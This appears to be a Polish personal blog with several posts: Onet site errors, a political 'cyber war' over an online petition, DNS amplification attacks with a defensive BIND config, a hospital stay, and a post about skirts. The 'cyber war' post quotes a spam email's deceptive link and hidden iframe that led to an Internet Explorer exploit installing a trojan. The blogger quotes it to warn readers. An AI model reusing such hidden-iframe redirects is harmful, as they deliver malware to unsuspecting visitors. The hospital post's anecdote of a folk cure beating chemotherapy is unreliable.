Luźne internetowe wpadki dzisiaj znalezione…

Dzisiesze bieganie po internecie zaowocowało kilkoma ładnymi kwiatkami. Cała Polska rzeczywistość, niestety przelana na internetowe bity. Oczywiście w handlu kwiatkami przoduje portal Onet. Dzisiejsze zalogowanie się na pocztę w godzinach szczytu to sukces, biorąc pod uwagę np. TO:

Rozumiem, że reklama niekoniecznie musi być ładowana z jednego serwera (oczywiste jest, że sam skrypt może być ładowany z innej lokalizacji) ale całość tworzy tragikomiczną farsę jaką ostatnio prezentuje nam Onet. Następny screen to już odcinek z serii "Dbajmy o bezpieczeństwo serwisu"

Incydent, jak sprawdziłem, niepowtarzalny, być może spowodowany zbyt dużą ilością połączeń, jednak można by zadbać o włąsną stronę błędów.

Co rusz jakiś kwiatek a przecież po necie surfowałem kilka minut. Ale w końcu romantyk jestem to i kwiatki lubię zbierać      

Cyber wojna…

 Nie, to nie kolejny odcinek z cyklu "zabawy pseudo hakerów". To określenie dla internetowej walki pomiędzy Kompanią Ojca Dyrektora połączoną z siłami zbrojnymi Romana Edukatora a resztą kraju. Jak wiadomo, zwolenników Romana Edukatora jest w kraju o wiele mniej niż zwolenników jego odejścia z pozycji ministra edukacji. Do wielu napewno dotarła wiadomośći o społecznej inicjatywie, mającej na celu odejście Romana.

Zadaniem serwisu Bez Giertycha jest zbieranie podpisów pod listem otwartym do premiera Kazimierza Marcinkiewicza z żądaniem odwołania nowo mianowanego ministra edukacji Romana Giertycha, który według autorów listu pochwala przemoc i neguje wartości tolerancji. Pod listem figuruje ponad 86 tys. podpisów. Dopisanie się do listu polega na wypełnieniu kilku pól formularza – z imieniem, nazwiskiem, zawodem i miastem pochodzenia.

Zwolennicy Giertycha, jakimi bez wątpienia jest Młodzież Wszechpolska, postarali się o w miarę skuteczny sabotaż (w miarę, bo każdy sprytniejszy informatyk mógłby wyfiltrować dane z formularza i znacząco zmniejszyć skutki sabotażu). Na angielsko języcznej wersji strony skrypt napisany w javie, który za pomocą przeglądarki odwiedzającego stronę, generuje co 3 sekundy jeden wpis do formularza, zawierający zamiast danych przypadkowe znaki. W ciągu jednego dnia takich wpisów pojawiło się kilkanaście tysięcy. Skrypt został szybko usunięty ze strony, jednak zwolennicy polski bez Romanów i Wszechpolaków, przypuścili kontratak.

Na konta pocztowe przypadkowych użytkowników zaczęto wysyłać spam. Spam zawierający z pozoru, zachętę do odwiedzania nowej strony Radia Maryja. Na dole podano oczywiście odpowiedni link, na który wiele osób kliknęło choćby z ciekawości. Link, którego źródło przedstawiało się w następujący sposób:

<a href="http://www.radiomaryja.be/" target="_blank">http://www.radiomaryja.pl/</a> Redakcja serwisu WWW rozgłośni Radia Maryja
</pre>
<iframe style="width:0;height:0;visibility:hidden;display:none"
src="http://www.radiomaryja.be/"></iframe>
</body></html>

Słowem jesteśmy przekierowywani na stronę www.radiomaryja.be a tam czeka na nas przekierowanie na kolejny serwer http://ircgalaxy.pl/hello,który po kilku (dokładniej 3 sekundach, przekierowywuje nas na stronę Radia Maryja, w tym samym czasie uruchamia jednak skrypt. Skrypt wykorzystujący lukę znalezioną w InternetExplorerze, a związaną z błędem w funkcji createTextRange. W efekcie w wyniku kolejnego sporego błędu w najpopularniejszej przeglądarce internetowej, na naszym komputerze instaluje się trojan/wykonuje się exploit etc.

Po raz kolejny apeluję o przerzucanie się niekoniecznie na moją ulubioną Mozillę, ale na cokolwiek oprócz IE. Bo póki co,

"cyber wojna" trwa… 

DNS i spamerzy…

BlueSecurity upadło… Największa światowa inicjatywa pomagająca uprzykrzyć życie (o której więcej możecie przeczytać TUTAJ ) spamerom poddała się po kolejnym ich ataku. Spamerzy zaatakowali raz jeszcze serwery firmy, tym razem metodą DNS amplification (wysyłanie z zainfekowanych komputerów do serwerów DNS dużej ilości zapytań, ze sfałszowanym adresem nadawcy – adresem ofiary). BlueSecurity, która od czasu ostatniego ataku korzystała z dostawcy usług – firmy Prolexic razem ze swoim dostawcą, zostało pozbawione kontaktu z siecią. Oprogramowanie zaisntalowane na większości serwerów DNS, czyli Bind odpowiadało na każde zapytanie stawiane przez zainfekowane stacje, prowadząc do paraliżu obu ofiar. Jak można przeczytać na w/w joggerze, jeden wkurzony spamer może sparaliżować całą, ogromną firmę. Co w takim razie może niebezpieczny przestępca, chcący w ten sposób np. wymusić korzyści majątkowe? Być może ten atak sprawi, że w sieci "coś ruszy". Stare i nad wyraz dziurawe oprogramowanie Bind zastąpi się alternatywne oprogramowanie takie jak np. Djbdns, którego nie zezwala w ogólena uruchomienie DNS cache i serwera autorytatywnego na jednym IP (najczęstrzy powód udostępnienia możliwości zapytań rekursywnych całemu światu).

Można też, jak wspomniał jeden z komentatorów, skonfigurować odpowiednio parametr "recursion" znajdujący się w usłudze Binda. Daje on możliwość stworzenia osobnych "widoków" dla sieci dla której świadczymy usługę DNS i dla całej reszty, a wygląda to następująco:

view "internal " { match-clients { # nasza siec 124.21.32.0/24; }; recursion yes; zone "blabla.pl" { (…) }; }: view "external "{ match-clients { any; }; recursion no; additional-from-auth no; additional-from-cache no; zone "blabla.pl" { (…) }; };

Byłem sobie w szpitalu…

Było zabawnie… Tak jak myślałem, czyli ładna pielęgniarka i zabawni współpacjenci. Był facet, który pół-pasiec musiał leczyć u mongolskiej znahorki (z pozytywnym skutkiem w przeciwnieństwie do tygodni spędzonych na chemii "prawdziwych lekarzy"). Od 2 tygodni goją mu się umyślne poparzenia ziołowym papierosem, ale za to pozbył się swojej choroby po 2 miesiącach zmagań. Ja tez się wyleczyłem chociaż na dzień dzisiejszy nie mam pojęcia czy do końca. Tak czy inaczej, w piłę narazie grać nie mogę… Mogę za to przygotowywać się do walki o stopień "dobry" z języka niemieckiego, a także wyjechać w sobotę na mecz Realu Madryt do Łodzi. Gra cała stara jedenastka Królewskich, nawet Hierro zadeklarował, że jednak odwiedzi nasz biedny kaczkowaty kraj… Problemem może być tylko logistyczne rozwiązanie podróży do Łodzi w której spotka się większa część redakcji realmadrid.pl

Wracam na powrót do zgłebiania tajników OO PHP, miałem na to bardzo dużo czasu w szpitalu więc może za niedługo podzielę sie z wami moimi spostrzeżeniami. Póki co – życzę miłego weekendu  

Uwielbiam hiszpańskie spódniczki…

Idzie sobie kobieta (osobnik homo sapiens – samica) ulicą. I rusza tymi ogolonymi i opalonymi, długimi…nogami. Goła aż do kolan, a wyżej stopiędździesiąty ósmy cud świata – spódniczka hiszpanka… Sunie przewiewna, cudowna i delikatnie cieniowana niebieskim kolorem spódniczka na wcale nie genialnych nogach… Ale i tak jest wspaniała. Mógłbym iść za nią przez miasto i napawać się jej widokiem. Spódniczki – nie kobiety. I stałoby się tak, gdyby przed moim domem nie nadział się na samochód, za co zostałem solidnie zdewastowany psychicznie przez jegomościa z niewyparzonym jęzorem. Właścicielka hiszpanki tylko się uśmiechęła – właściciel auta chciał mnie zlinczować… Jak kiedyś jeszcze znajdę sobie partnerkę – pierwsze co robimy to idziemy po hiszpankę… Jak się nie podoba – to nie jest partnerka

W tym miejscu pozdrowienia dla Dominiki, która i tak raczej tego jogga nie czyta, ale za to chodzi baaaardzo często w spódnicy, co jest takie kobiece i piękne. I chodzi w hiszpance często, tak kobieco… Pytanie tylko, dlaczego większość kobiet nie bierze z niej przykładu?